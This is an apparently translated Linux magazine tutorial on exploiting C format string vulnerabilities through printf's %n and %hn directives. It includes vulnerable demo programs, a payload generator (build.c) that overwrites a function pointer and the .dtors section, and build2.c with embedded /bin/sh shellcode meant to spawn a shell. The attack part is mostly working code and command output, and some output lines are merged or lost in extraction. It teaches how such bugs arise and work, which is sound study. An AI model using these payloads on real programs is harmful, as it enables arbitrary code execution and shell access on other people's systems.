![[image of the authors]](../../common/images/FredCrisBCrisG.jpg) 
 
    Original in fr Frédéric Raynal, Christophe Blaess, Christophe Grenier
fr to en:Frédéric
en to en:Lorne Bailey
Christophe Blaess is an independent aeronautics engineer. He is a Linux fan and does much of his work on this system. He coordinates the translation of the man pages as published by the Linux Documentation Project.
Christophe Grenier is a 5th year student at the ESIEA, where he works as a sysadmin too. He has a passion for computer security.
Frédéric Raynal has been using Linux for many years because it doesn't pollute, it doesn't use hormones, MSG or animal by-products... only sweat and craft.
![[article illustration]](../../common/images/illustration183.gif) 
 
    Most security flaws come from bad configuration or laziness. This rule holds true for format strings.
It is often necessary to use null terminated strings in a program. Where 
    inside the program is not important here. This vulnerabilty is
    again about writing directly to memory. The data for the attack can come 
    from stdin, files, etc.
    A single instruction is enough:
printf("%s", str);
    However, a programmer can decide to save time and six bytes while writing only:
printf(str);
    With "economy" in mind, this programmer opens a
    potential hole in his work. He is satisfied with passing a single
    string as an argument, which he wanted simply to display without
    any change. However, this string will be parsed to look for
    directives of formatting (%d, %g...) .
    When such a format character is discovered, the corresponding
    argument is looked for in the stack.
We will start introducing the family of printf() functions.
    At least, we expect everyone knows them ... but not in detail, so
    we will deal with the lesser known aspects of these routines. Then,
    we will see how to get the necessary information to exploit such a
    mistake. Finally, we will show how all this fits together with a
    single example.
printf() : they told me a lie !Let us start with what we all learned in our programming's handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it shold be displayed. The following program illustrates this:
/* display.c */
#include <stdio.h>
main() {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
}
    Running it displays: 
>>gcc display.c -o display >>./display int : 64 97 char : @ aThe first
printf() writes the value of the integer
    variable i and of the character variable
    a as int (this is done using
    %d), which leads for a to display its
    ASCII value. On the other hand, the second printf()
    converts the integer variable i to the corresponding
    ASCII character code, that is 64. 
    Nothing new - everything conforms to the
    many functions with a prototype similar to the
    printf() function :
const
      char *format) is used to specify the selected format;Most of our programming lessons stop there, providing a non
    exhaustive list of possible formats (%g,
    %h, %x, the use of the dot character
    . to force the precision...) But, there is another one
    never talked about:%n. Here is what the
    printf()'s man page says about it:
| The number of characters written so far is stored into
          the integer indicated by the int *(or variant)
          pointer argument. No argument is converted. | 
Here is the most important thing of this article: this argument makes it possible to write into a pointer variable , even when used in a display function !
Before continuing, let us say that this format also exists for
    functions from the scanf() and syslog()
    family.
We are going to study the use and the behavior of this format
    through small programs. The first, printf1, shows a
    very simple use:
/* printf1.c */
1: #include <stdio.h>
2: 
3: main() {
4:   char *buf = "0123456789";
5:   int n;
6:   
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }
    The first printf() call displays the string
    "0123456789" which contains 10 characters. The next
    %n format writes this value to the variable
    n:
>>gcc printf1.c -o printf1 >>./printf1 0123456789 n = 10Let's slightly transform our program by replacing the instruction
printf() line 7 with the following one: 
7:   printf("buf=%s%n\n", buf, &n);
    Running this new program confirms our idea: the variable
    n is now 14, (10 characters from the buf
    string variable added to the 4 characters from the
    "buf=" constant string, contained in the format string
    itself).
So, we know the %n format counts every character
    that appears in the format string. Moreover, as we will demonstrate
    the printf2 program, it counts even further:
/* printf2.c */
#include <stdio.h>
main() {
  char buf[10];
  int n, x = 0;
  
  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
}
    The use of the snprintf() function is to prevent from
    buffer overflows. The variable n should then be 10: 
>>gcc printf2.c -o printf2 >>./printf2 l = 9 n = 100Strange ? In fact, the
%n format considers the amount of
    characters that should have been written.
    This example shows that truncating due to the size specification is
    ignored. 
    What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:
/* printf3.c */
#include <stdio.h>
main() {
  char buf[5];
  int n, x = 1234;
  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, sizeof buf);
}
    printf3 contains some differences compared to
    printf2: 
    >>gcc printf3.c -o printf3 >>./printf3 l = 4 n = 5 buf = [0123] (5)The first two lines are not surprising. The last one illustrates the behavior of the
printf() function : 
    00000\0";x in our example. The string then
      looks like "01234\0";sizeof buf - 1 bytes2 from this string is copied into the
      buf destination string, which give us
      "0123\0"GlibC
    sources, and particularly vfprintf() in the
    ${GLIBC_HOME}/stdio-common directory. 
    Before ending with this part, let's add that it is possible to
    get the same results writing in the format string in a slightly
    different way. We previously used the format called
    precision (the dot '.'). Another combination of formatting
    instructions leads to an identical result: 0n, where
    n is the the number width , and
    0 means that the spaces should be replaced with 0
    just in case the whole width is not filled up.
Now that you know almost everything about format strings, and
    most specifically about the %n format, we will study
    their behaviors.
printf()The next program will guide us all along this section to
    understand how printf() and the stack are related:
/* stack.c */
 1: #include <stdio.h>
 2: 
 3: int
 4  main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }
    This program just copies an argument into the buffer
    character array . We take care not to overflow some important
    data (format strings are really more accurate than buffer
    overflows ;-) 
>>gcc stack.c -o stack >>./stack toto buffer : [toto] (4) i = 1 (bffff674)It works as we expected :) Before going further, let's examine what happens from the stack point of view while calling
snprintf() at line 8. 
    | Fig. 1 : the stack at the
          beginning of snprintf() | 
|   | 
Figure 1 describes the state of the
    stack when the program enters the snprintf() function
    (we'll see that it is not true ... but this is just to give you an idea of
    what's happening). We don't care about the %esp
    register. It is somewhere below the %ebp register. As
    we have seen in a previous article, the first two values located in
    %ebp and %ebp+4 contain the respective
    backups of the %ebp and %ebp+4 registers.
    Next come the arguments of the function snprintf():
    
argv[1] which
      also acts as data.tmp
    array of 4 characters , the 64 bytes of the variable
    buffer and the i integer variable . 
    The argv[1] string is used at the same time as
    format string and data. According to the normal order of the
    snprintf() routine, argv[1] appears
    instead of the format string. Since you can use a format string
    without format directives (just text), everything is fine :)
What happens when argv[1] also contains
    formatting ? ? Normally, snprintf() interprets them as
    they are ... and there is no reason why it should act differently !
    But here, you may wonder what arguments are going to be used as
    data for formatting the resulting output string. In fact,
    snprintf() grabs data from the stack! You can see that
    from our stack program:
>>./stack "123 %x" buffer : [123 30201] (9) i = 1 (bffff674)
First, the "123 " string is copied into
    buffer. The %x asks
    snprintf() to translate the first value into
    hexadecimal. From figure 1, this first
    argument is nothing but the tmp variable which
    contains the \x01\x02\x03\x00 string. It is displayed
    as the 0x00030201 hexadecimal number according to our little endian
    x86 processor.
>>./stack "123 %x %x" buffer : [123 30201 20333231] (18) i = 1 (bffff674)
Adding a second %x enables you to go higher in the
    stack. It tells snprintf() to look for the next 4
    bytes after the tmp variable. These 4 bytes are in
    fact the 4 first bytes of buffer. However,
    buffer contains the "123 " string, which
    can be seen as the 0x20333231 (0x20=space, 0x31='1'...) hexadecimal
    number. So, for each %x, snprintf()
    "jumps" 4 bytes further in buffer (4 because
    unsigned int takes 4 bytes on x86 processor). This
    variable acts as double agent by:
>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378 
         0x333837] (63)
i = 1 (bffff654)
    You can find an occasionally useful format when it is necessary
    to swap between the parameters (for instance, while displaying date
    and time). We add the m$ format, right after the
    %, where m is an integer >0. It gives
    the position of the variable to use in the arguments list (starting
    from 1):
/* explore.c */
#include <stdio.h>
  int
main(int argc, char **argv) {
  char buf[12];
  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);
  printf("[%s] (%d)\n", buf, strlen(buf));
}
    The format using m$ enables us to go up where we want in the stack, as we could do using
    gdb:
>>./explore %1\$x [0] (1) >>./explore %2\$x [0] (1) >>./explore %3\$x [0] (1) >>./explore %4\$x [bffff698] (8) >>./explore %5\$x [1429cb] (6) >>./explore %6\$x [2] (1) >>./explore %7\$x [bffff6c4] (8)
The character \ is necessary here to protect the
    $ and to prevent the shell from interpreting it. In the
    first three calls we visit contents of the buf variable. 
    With %4\$x, we get the %ebp
    saved register, and then with the next %5\$x, the
    %eip saved register (a.k.a. the return address). The
    last 2 results presented here show the argc variable
    value and the address contained in *argv (remember
    that **argv means that *argv is an
    addresses array).
This example illustrates that the provided formats enable us to
    go up within the stack in search of information, such as the return
    value of a function, an address... However, we saw at the beginning
    of this article that we could write using functions of the
    printf()'s type: doesn't this look like a wonderful
    potential vulnerability ?
Let's go back to the stack program:
>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"' buffer : [döÿ¿000000000000000000000000000000000000000000000000 00000000000] (63) i = 500 (bffff664)We give as input string:
i variable address;%.496x);%n) which will
      write into the given address.i variable address
    (0xbffff664 here), we can run the program twice and
    change the command line accordingly. As you can note it,
    i has a new value :) The given format string and the
    stack organization make snprintf() look like : 
snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);
    The first four bytes (containing the i address) are
    written at the beginning of buffer. The
    %.496x format allows us to get rid of the
    tmp variable which is at the beginning of the stack.
    Then, when the formatting instruction is the %n, the
    address used is the i's one, at the beginning of
    buffer. Although the precision required is
    496, snprintf writes only sixty bytes at maximum (because the length
    of the buffer is 64 and 4 bytes have already been written). The value
    496 is arbitrary, and is just used to manipulate the "byte
    counter". We have seen that the %n format saves the
    amount of bytes that should have been written. This value is
    496, to which we have to add 4 from the 4 bytes of the
    i address at the beginning of buffer. 
    Therefore, we have counted 500 bytes. This value will be written into the
    next address found in the stack, which is the i's
    address.
We can go even further with this example. To change
    i, we needed to know its address ... but sometimes the
    program itself provides it:
/* swap.c */
#include <stdio.h>
main(int argc, char **argv) {
  int cpt1 = 0;
  int cpt2 = 0;
  int addr_cpt1 = &cpt1;
  int addr_cpt2 = &cpt2;
  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
}
    Running this program shows that we can control the stack (almost) as we want:
>>./swap AAAA AAAA cpt1 = 0 cpt2 = 0 >>./swap AAAA%1\$n AAAA cpt1 = 0 cpt2 = 4 >>./swap AAAA%2\$n AAAA cpt1 = 4 cpt2 = 0
As you can see, depending on the argument, we can change either
    cpt1, or cpt2. The %n format
    expects an address, that is why we can't directly act on
    the variables, ( i.e. using %3$n (cpt2) or %4$n 
    (cpt1) ) but have to go through pointers. The latter are
    "fresh meat" with enormous possibilities for modification.
    
egcs-2.91.66 and glibc-2.1.3-22. However,
    you probably won't get the same results on your own box. Indeed,
    the functions of the *printf() type change according
    to the glibc and the compilers do not carry out the
    same operations at all. 
    The program stuff highlights these differences:
/* stuff.c */
#include <stdio.h>
main(int argc, char **argv) {
  
  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";
  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }
  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
}
    The aaa and bbb arrays are used as
    delimiters in our journey through the stack. Therefore we know that
    when we find 424242, the following bytes will be in
    buffer. Table 1 presents the
    differences according to the versions of the glibc and
    compilers.
| Tab. 1 : Variations around glibc | ||
|---|---|---|
|  |  |  | 
| gcc-2.95.3 | 2.1.3-16 | buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63) | 
| egcs-2.91.66 | 2.1.3-22 | buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63) | 
| gcc-2.96 | 2.1.92-14 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) | 
| gcc-2.96 | 2.2-12 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) | 
Next in this article, we will continue to use
    egcs-2.91.66 and the glibc-2.1.3-22 , but
    don't be surprised if you note differences on your machine.
While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.
With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, ...), we just
    have to say where and what to write for %n doing the
    job for us.
/* vuln.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int helloWorld();
int accessForbidden();
int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();
  memset(buffer, 0, sizeof(buffer));
  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);
  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
  
  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));
  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);
  return ptrf();
}
int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);
  
  exit(vuln(argv[1]));
}
int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}
int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}
    We define a variable named ptrf which is a pointer
    to a function. We will change the value of this pointer to run the
    function we choose.
First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:
>>./vuln "AAAA %x %x %x %x" helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5d4) buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37) after : ptrf() = 0x8048634 (0xbffff5d4) Welcome in "helloWorld" >>./vuln AAAA%3\$x helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5e4) buffer = [AAAA41414141] (12) after : ptrf() = 0x8048634 (0xbffff5e4) Welcome in "helloWorld"
The first call here gives us what we need: 3 words (one word = 4
    bytes for x86 processors) separate us from the beginning of the
    buffer variable. The second call, with
    AAAA%3\$x as argument, confirms this.
Our goal is now to replace the value of the initial pointer
    ptrf (0x8048634, the address of the
    function helloWorld()) with the value
    0x8048654 (address of accessForbidden()).
    We have to write 0x8048654 bytes (134514260 bytes in
    decimal, something like 128Mbytes). All computers can't afford such a
    use of memory ... but the one we are using can :) It last around 20
    seconds on a dual-pentium 350 MHz:
>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n ` helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5d4) buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000 0000000000000] (127) after : ptrf() = 0x8048654 (0xbffff5d4) You shouldn't be here "accesForbidden"
What did we do? We just provided the address of ptrf
    (0xbffff5d4). The next format (%.134514256x)
    reads the first word from the stack, with a precision of 134514256
    (we already have written 4 bytes from the address of
    ptrf, so we still have to write
    134514260-4=134514256 bytes). At last, we write the
    wanted value in the given address (%3$n).
However, as we mentioned it, it isn't always possible to use
    128MB buffers. The format %n waits for a pointer to an
    integer, i.e. four bytes. It is possible to alter its behavior to
    make it point to a short int - only 2 bytes - thanks
    to the instruction %hn. We thus cut the integer to
    which we want to write two parts.
    The largest writable size will
    then fit in the 0xffff bytes (65535 bytes). Thus in
    the previous example, we transform the operation  writing "
    0x8048654 at the 0xbffff5d4 address" into
    two successive operations : :
0x8654 in the 0xbffff5d4
      address0x0804 in the
      0xbffff5d4+2=0xbffff5d6 addressHowever, %n (or %hn) counts the total
    number of characters written into the string. This number can only
    increase. First, we have to write the
    smallest value between the two. Then, the second formatting will
    only use the difference between the needed number
    and the first number written as precision. For instance in our example, the first
    format operation will be %.2052x (2052 = 0x0804) and
    the second %.32336x (32336 = 0x8654 - 0x0804). Each
    %hn placed right after will record the right amount of
    bytes.
We just have to specify where to write to both %hn.
    The m$ operator will greatly help us. If we save the
    addresses at the beginning of the vulnerable buffer, we just have
    to go up through the stack to find the offset from the beginning of
    the buffer using the m$ format. Then, both addresses will
    be at an offset of m and m+1. As we use
    the first 8 bytes in the buffer to save the addresses to overwrite,
    the first written value must be decreased by 8.
Our format string looks like:
"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max -
      val. min.]x%[offset+1]$hn"
    The build program uses three arguments to create a format string:
    
/* build.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value, 
      unsigned int where) {
  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128; 
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;
  char *buf;
  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom
  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);
  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);
  /* let's build */
  if (valh < vall) {
    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */
         "%%.%hdx"            /* set the value for the first %hn */
         "%%%d$hn"            /* the %hn for the high part */
         "%%.%hdx"            /* set the value for the second %hn */
         "%%%d$hn"            /* the %hn for the low part */         
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */
         valh-8,              /* set the value for the first %hn */  
         where,               /* the %hn for the high part */        
                                                         
         vall-valh,           /* set the value for the second %hn */ 
         where+1              /* the %hn for the low part */               
         );
         
  } else {
     snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */
         "%%.%hdx"            /* set the value for the first %hn */    
         "%%%d$hn"            /* the %hn for the high part */          
                                                           
         "%%.%hdx"            /* set the value for the second %hn */   
         "%%%d$hn"            /* the %hn for the low part */           
         ,                                                     
         b3+2, b2, b1, b0,    /* high address */                       
         b3, b2, b1, b0,      /* low address */                        
                                                           
         vall-8,              /* set the value for the first %hn */    
         where+1,             /* the %hn for the high part */          
                                                           
         valh-vall,           /* set the value for the second %hn */   
         where                /* the %hn for the low part */
         );
  }
  return buf;
}
int
main(int argc, char **argv) {
  char *buf;
  if (argc < 3)
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
          strtoul(argv[2], NULL, 16),  /* valeur */
          atoi(argv[3]));              /* offset */
  
  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}
    The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let's check what we get now, without any memory troubles.
First, our simple example allows us guessing the offset:
>>./vuln AAAA%3\$x argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5d4) buffer = [AAAA41414141] (12) after : ptrf() = 0x8048644 (0xbffff5d4) Welcome in "helloWorld"
It is always the same : 3. Since our program is done to explain
    what happens, we already have all the other information we would
    need : the ptrf and accesForbidden()
    addresses . We build our buffer according to these:
>>./vuln `./build 0xbffff5d4 0x8048664 3` adr : -1073744428 (bffff5d4) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33) argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5b4) buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000 00000000] (127) after : ptrf() = 0x8048644 (0xbffff5b4) Welcome in "helloWorld"Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved.
ptrf has gone from 0xbffff5d4 to
    0xbffff5b4). Our values need to be adjusted: 
>>./vuln `./build 0xbffff5b4 0x8048664 3` adr : -1073744460 (bffff5b4) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33) argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5b4) buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 0000000000000000] (127) after : ptrf() = 0x8048664 (0xbffff5b4) You shouldn't be here "accesForbidden"We won!!!
We have seen that format bugs allow us to write anywhere. So, we
    will see now an exploitation based on the .dtors
    section.
When a program is compiled with gcc, you can find a
    constructor section (named .ctors) and a destructor
    (named .dtors). Each of these sections contains
    pointers to functions to be carried out before 
    entering the main() function and after exiting, respectively.
    
/* cdtors */
void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));
int main() {
  printf("in main()\n");
}
void start(void) {
  printf("in start()\n");
}
void end(void) {
  printf("in end()\n");
}
    Our small program shows that mechanism: 
>>gcc cdtors.c -o cdtors >>./cdtors in start() in main() in end()Each one of these sections is built in the same way:
>>objdump -s -j .ctors cdtors cdtors: file format elf32-i386 Contents of section .ctors: 804949c ffffffff dc830408 00000000 ............ >>objdump -s -j .dtors cdtors cdtors: file format elf32-i386 Contents of section .dtors: 80494a8 ffffffff f0830408 00000000 ............We check that the indicated addresses match those of our functions (attention : the preceding
objdump command gives the
    addresses in little endian): 
>>objdump -t cdtors | egrep "start|end" 080483dc g F .text 00000012 start 080483f0 g F .text 00000012 endSo, these sections contain the addresses of the functions to run at the beginning (or the end), framed with
0xffffffff
    and 0x00000000. 
    Let us apply this to vuln by using the format
    string. First, we have to get the location in memory of these
    sections, which is really easy when you have the binary at hand ;-)
    Simply use the objdump like we did previously:
>> objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 8049844 ffffffff 00000000 ........Here it is ! We have everything we need now.
The goal of the exploitation is to replace the address of a
    function in one of these sections with the one of the functions we
    want to execute. If those sections are empty, we just have to
    overwrite the 0x00000000 which indicates the end of
    the section. This will cause a segmentation fault
    because the program won't find this 0x00000000,
    it will take the next value as the address of a function, which is
    probably not true.
In fact, the only interesting section is the destructor section
    (.dtors): we have no time to do anything before the
    constructor section (.ctors). Usually, it is enough to
    overwrite the address placed 4 bytes after the start of the section
    (the 0xffffffff):
0x00000000;Let's go back to our example. We replace the
    0x00000000 in section .dtors, placed in
    0x8049848=0x8049844+4, with the address of the
    accesForbidden() function, already known
    (0x8048664):
>./vuln `./build 0x8049848 0x8048664 3` adr : 134518856 (8049848) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [JH%.2044x%3$hn%.32352x%4$hn] (33) argv2 = bffff694 (0xbffff51c) helloWorld() = 0x8048648 accessForbidden() = 0x8048664 before : ptrf() = 0x8048648 (0xbffff434) buffer = [JH0000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 000] (127) after : ptrf() = 0x8048648 (0xbffff434) Welcome in "helloWorld" You shouldn't be here "accesForbidden" Segmentation fault (core dumped)Everything runs fine, the
main()
    helloWorld() and then exit. The destructor is then
    called. The section .dtors starts with the address of
    accesForbidden(). Then, since there is no other real
    function address, the expected coredump happens. 
    We have seen simple exploits here. Using the same principle
    we can get a shell, either by passing the shellcode through
    argv[] or an environment variable to the vulnerable
    program. We just have to set the right address (i.e. the address of
    the eggshell) in the section .dtors.
Right now, we know:
However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).
The idea is based on recursive calls of the function
    exec*():
/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char **argv) {
  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;
  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;
  
  arg    = (char **) malloc(sizeof(char *) * nb);
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;
  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");
  /* recall */
  if (nb == 0) 
    exit(0);
  execve(argv[0], arg, env);
}
    The input is an nb integer that the program will
    recursively calle itself nb+1 times: 
>>./argv 2 *** argv 2 *** argv = 0xbffff6b4 arg = 0x8049828 argv[0] = 0xbffff80b (0xbffff6b4) arg[0] = 0xbffff80b (0x8049828) argv[1] = 0xbffff812 (0xbffff6b8) arg[1] = 0x8049838 (0x804982c) *** argv 1 *** argv = 0xbfffff44 arg = 0x8049828 argv[0] = 0xbfffffec (0xbfffff44) arg[0] = 0xbfffffec (0x8049828) argv[1] = 0xbffffff3 (0xbfffff48) arg[1] = 0x8049838 (0x804982c) *** argv 0 *** argv = 0xbfffff44 arg = 0x8049828 argv[0] = 0xbfffffec (0xbfffff44) arg[0] = 0xbfffffec (0x8049828) argv[1] = 0xbffffff3 (0xbfffff48) arg[1] = 0x8049838 (0x804982c)
We immediately notice the allocated addresses for
    arg and argv don't move anymore after the
    second call. We are going to use this property in our exploit. We
    just have to change our build program slightly to make
    it call itself before calling vuln. So, we get the
    exact argv address, and the one of our shellcode.:
/* build2.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}
int
main(int argc, char **argv) {
  
  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  if(argc < 3)
    return EXIT_FAILURE;
  if (argc == 3) {
    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    execlp(argv[0], argv[0], buf, &shellcode, argv[1], argv[2], NULL);
  } else {
    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* adresse */
        argv[2],
        atoi(argv[4]));              /* offset */
    
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }
  return EXIT_SUCCESS;
}
    The trick is that we know what to call according to the number
    of arguments the program received. To start our exploit, we just
    give to build2 the address we want to write to and
    the offset. We don't have to give the value anymore since it is
    going to be evaluated by our successive calls.
To succeed, we need to keep the same memory layout
    between the different calls of build2 and then
    vuln (that is why we call the build()
    function, in order to use the same memory footprint):
>>./build2 0xbffff634 3 Calling ./build2 ... adr : -1073744332 (bffff634) val : -1073744172 (bffff6d4) valh: 49151 (bfff) vall: 63188 (f6d4) [6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34) Calling ./vuln ... sc = 0xbffff88f adr : -1073744332 (bffff634) val : -1073743729 (bffff88f) valh: 49151 (bfff) vall: 63631 (f88f) [6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34) 0 0xbffff867 1 0xbffff86e 2 0xbffff891 3 0xbffff8bf 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000 00000000000] (127) after : ptrf() = 0xbffff88f (0xbffff634) Segmentation fault (core dumped)
Why didn't this work ? We said we had to build the exact copy of
    the memory between the 2 calls ... and we didn't do it !
    argv[0] (the name of the program) changed. Our program
    is first named build2 (6 bytes) and vuln
    after (4 bytes). There is a difference of 2 bytes, which is exactly
    the value that you can notice in the example above. The address
    of the shellcode during the second call of build2 is
    given by sc=0xbffff88f but the content of
    argv[2] in vuln gives
    20xbffff891: our 2 bytes. To solve this, it is enough
    to rename our build2 to only 4 letters e.g
    bui2:
